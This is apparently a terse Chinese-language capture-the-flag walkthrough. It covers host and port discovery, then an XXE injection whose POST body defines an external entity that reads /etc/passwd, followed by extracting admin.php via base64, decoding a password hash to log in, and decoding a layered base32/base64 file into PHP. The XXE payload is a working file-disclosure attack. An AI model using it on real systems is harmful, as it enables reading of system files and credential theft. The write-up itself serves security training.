一、 收集資訊
存活主機
開放端口
存在注入
Post包裡面添加
<?xml version=“1.0″ encoding=“UTF-8″?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>1</password></root>
注出admin.php頁面,然後base64解密
得到賬号密碼
解密e6e061838856bf47e1de730719fb2609 [email protected]
賬号:administhebest
登陸
得到flag
先進行base32解密,再進行base64解密。
讀取這個檔案看一看
解碼
這。。。。看起來像php?複制下來儲存到本地,命名為1.php,放到wamp中通路一波